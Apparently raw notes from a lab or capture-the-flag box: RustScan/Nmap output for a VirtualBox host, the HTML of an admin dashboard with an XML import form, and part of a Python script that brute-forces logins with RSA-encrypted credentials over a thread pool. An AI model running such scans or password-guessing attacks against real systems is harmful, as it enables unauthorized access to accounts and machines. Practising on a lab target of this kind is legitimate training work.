rustscan -a 192.168.56.149 --ulimit 5000 -- -sV -O .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP [~] The config file is expected to be at "/home/tlgjm/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 192.168.56.149:22 Open 192.168.56.149:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -O" on ip 192.168.56.149 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-10 20:43 +0800 NSE: Loaded 48 scripts for scanning. Initiating ARP Ping Scan at 20:43 Scanning 192.168.56.149 [1 port] Completed ARP Ping Scan at 20:43, 0.17s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 20:43 Completed Parallel DNS resolution of 1 host. at 20:43, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 20:43 Scanning 192.168.56.149 [2 ports] Discovered open port 22/tcp on 192.168.56.149 Discovered open port 80/tcp on 192.168.56.149 Completed SYN Stealth Scan at 20:43, 0.01s elapsed (2 total ports) Initiating Service scan at 20:43 Scanning 2 services on 192.168.56.149 Completed Service scan at 20:43, 6.04s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.56.149 NSE: Script scanning 192.168.56.149. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 20:43 Completed NSE at 20:43, 3.07s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 20:43 Completed NSE at 20:43, 2.00s elapsed Nmap scan report for 192.168.56.149 Host is up, received arp-response (0.014s latency). Scanned at 2026-03-10 20:43:36 CST for 13s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian)) MAC Address: 08:00:27:36:56:0B (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.98%E=4%D=3/10%OT=22%CT=%CU=40800%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=69B01205%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S) Uptime guess: 34.314 days (since Wed Feb 4 13:11:06 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
<!DOCTYPE html> <htmllang="en"> <head> <metacharset="UTF-8"> <metaname="viewport"content="width=device-width, initial-scale=1.0"> <title>MazeSec Community - Admin Dashboard</title> <linkrel="stylesheet"href="styles.css"> </head> <body> <divclass="dashboard-container"> <divclass="dashboard-header"> <h1>Admin Dashboard</h1> <divclass="user-info"> <spanid="username">Admin</span> <buttonclass="logout-btn"onclick="logout()">Logout</button> </div> </div> <divclass="dashboard-grid"> <divclass="dashboard-card"> <h2>Data Import</h2> <p>Import data from XML files. The system will parse and process the imported data automatically.</p> <formid="importForm"class="login-form"enctype="multipart/form-data"> <divclass="form-group"> <labelfor="xmlFile">XML File</label> <inputtype="file"id="xmlFile"name="xmlFile"accept=".xml"required> </div> <buttontype="submit"class="btn-primary">Import Data</button> </form> <divid="importMessage"style="display: none;"></div> <divclass="info-box"> <strong>Note:</strong> The system supports standard XML format. Make sure your XML file is well-formed. </div> </div> </div> <divclass="dashboard-card"> <h2>System Information</h2> <divclass="info-box"> <p><strong>Server:</strong><code>mazesec-web-01</code></p> <p><strong>PHP Version:</strong><code>8.1.0</code></p> <p><strong>Status:</strong><spanstyle="color: #34c759;">●</span> All systems operational</p> </div> </div> </div> <scriptsrc="dashboard.js"></script> </body> </html>
import json import base64 import requests import threading from concurrent.futures import ThreadPoolExecutor from Crypto.Cipher import AES, PKCS1_v1_5 from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad from Crypto.Random import get_random_bytes
# 和前端一致的 RSA 公钥 RSA_PUBLIC_KEY = """-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt6l3k43vuI+8ODHhr07q /fBswyWqv5d0SsoX2+i5rWy98PW58HNrKveU6IDRhWFOmA8MQ0j7zUcH33VGaQNO ZdI8gmo4pdlABQJ7EM4E6KGYCxlyIi4QtyUorBP6pfS1nlLCyAIcybnpia4kHT/p MqaIXKMVqDYHGJMNp0LIBkFA0eKp9usd2YStJ0nzgZrJS2t8znbvqXqx8uvBkRpZ bEZKUc3skgUIumazaw4plE+OzcVAa/67vuD7e7sycVHY+McsphLm+1CjS1jjvBt6 z036X4WJUANNIb4K2yJ8tYREXbxLQ5uwnVb9cwbQKSGg8Tr6GgSkbNjseAgZaUPt QwIDAQAB -----END PUBLIC KEY-----"""
with ThreadPoolExecutor(max_workers=max_workers) as executor: for u in usernames: if found_event.is_set(): break for p in passwords: if found_event.is_set(): break executor.submit(worker, u, p)